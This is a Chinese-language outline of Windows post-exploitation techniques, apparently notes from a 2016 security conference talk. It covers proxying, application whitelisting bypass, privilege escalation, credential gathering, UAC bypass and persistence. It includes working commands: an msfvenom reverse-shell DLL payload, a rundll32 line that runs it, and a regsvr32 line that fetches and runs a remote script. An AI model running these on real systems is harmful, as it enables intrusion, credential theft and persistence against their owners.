小结
后渗透主要行为
- Proxy
- Bypass Application Whitelisting
- Escalate Privileges
- Information Gathering
- Persistence
- Detection and Mitigations
Proxy
端口转发 Client -> lcx, Netsh; HTTP->Tunnel; Metasploit->Portpwd
Socks代理 Client->Ew,Xsocks; HTTP->ReGeorg; Metasploit-> Socks4a
其他 SSH ICMP
VPN
Bypass Application Whitelisting
绕过思路
- HTA
- Office Macro
- Cpl
- Chm
- Powershell
- Rundll32
- Regsvr32
- Regsvcs
- Installutil
HTA
vbscript
javascript
Office Macro
MacroRaptor
https://bitbucket.org/decalage/oletools/wiki/mraptor
DLL/CPL
生成
payload.dll:
msfvenom -p windows/meterpreter/reverse_tcp -b ‘\x00\xff’ lhost=192.168.127.132 lport=8888 -f dll -o payload.dll
http://drops.wooyun.org/tips/16042
(1) 直接运行dll: rundll32 shell32.dll,Control_RunDLL payload.dll
(2) 将dll重命名成cpl,双击运行
(3) 普通的dll直接改后缀名
Chm
高级组合技巧打造完美捆绑后门
http://drops.wooyun.org/tips/14254
利用系统 CHM 实现隐蔽后门:
《那些年我们玩过的奇技淫巧》
Powershell
Command
Lnk
如果禁用powershell
通过.Net 执行 powershell
http://blog.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/p0wnedShell
https://github.com/Cn33liz/p0wnedShellPowerOPS
https://labs.portcullis.co.uk/blog/powerops-powershell-for-offensive-operations/
Rundll32
JavaScript
|
|
DLL
http://drops.wooyun.org/tips/11764
Regsvr32
三种启动方式
regsvr32 /u /n /s /i:padload.sct scrobj.dll
regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll
右键注册
http://subt0x10.blogspot.jp/2016/04/bypass-application-whitelisting-script.html
http://drops.wooyun.org/tips/15124
Regsvcs
https://gist.github.com/subTee/e1c54e1fdafc15674c9a
Installutil
编译
InstallUtil.exe /U InstallUtil.exe
http://subt0x10.blogspot.jp/2015/08/application-whitelisting-bypasses-101.html
http://drops.wooyun.org/tips/8862
可执行目录
通过ps 脚本扫描可写入的路径
http://go.mssec.se/AppLockerBC
Escalation
常见提权方式
- 本地提权漏洞
- 服务提权
- 协议
- phishing
本地提权
根据补丁号来确定是否存在漏洞的脚本
https://github.com/GDSSecurity/Windows-Exploit-Suggester
将victim计算机的systeminfo导出到文件
Systeminfo>1.txt
使用脚本判断存在的漏洞
python windows/exploit-suggester.py –database 2016-05-31mssb.xls –systeminfo ~/Desktop/1.txt
可能遇到exp被杀的问题
将exp改成powershell
http://evi1cg.me/archives/MS16-032-Windows-Privilege-Escalation.html
服务提权
常用服务: mssql,mysql,oracle,ftp
第三方服务: dll hijacking, file hijacking
提权脚本powerup
https://drops.wooyun.org/tips/11989
协议提权
利用已知的windows问题,以获得本地权限提升 -> Potato
其利用NTLM中继(特别时基于HTTP > SMB中继)和 NBNS 欺骗进行提权
http://tools.pwn.ren/2016/01/17/patato-windows.html
phishing
msf ask 模块
exploit/windows/local/ask
通过runas方式来诱导用户通过点击uac验证来获取最高权限
需要修改的msf脚本
metasploit/lib/msf/core/post/windows/runas.rb
Information Gathering
LaZagne
mstsc记录
浏览器历史记录
本机用户密码
本机 WiFi ssid 以及 WiFi密码
本机最近操作文件
本机System info
证书!
Installed Programs: Startup Items
Installed Services: Security Services File/Printer Shares DatabaseServers Cerificate Authority
Sensitive Data: Key-logging Screen capture Network traffic
User Information
System Configuration: Password Policy Security Policies Configured Wireless Network and keys
键盘记录
屏幕录像
Netripper
phishing密码
通过脚本弹出认证窗口
https://github.com/Ridter/Pentest/blob/master/note/Powershell_MSFCapture.md
msf模块
post/windows/gather/phish_windows_credentials
Bypass UAC
- 使用 IFileOperation COM 接口
- 使用 Wusa.exe extract
- 远程注入shellcode 傀儡进程
- DLL劫持,劫持系统DLL文件
- 直接提权过UAC
- Phishing http://evi1cg.me/archives/Powershell_Bypass_UAC.html
- http://www.powershellempire.com/?page_id=380
无文件攻击
powershell
jsrat
mshta
sct
wsc
Persistence
- 启动项
- 注册表
- wmi
- at
- schtasks
- 劫持已有的第三方服务
- bitsadmin
Detection
bitsadmin /list /allusers /verbose
Stop Background Intelligent Transfer Service
参考资料
乌云白帽大会 2016 ShellIsOnlyTheBeginning 3gstudent evi1cg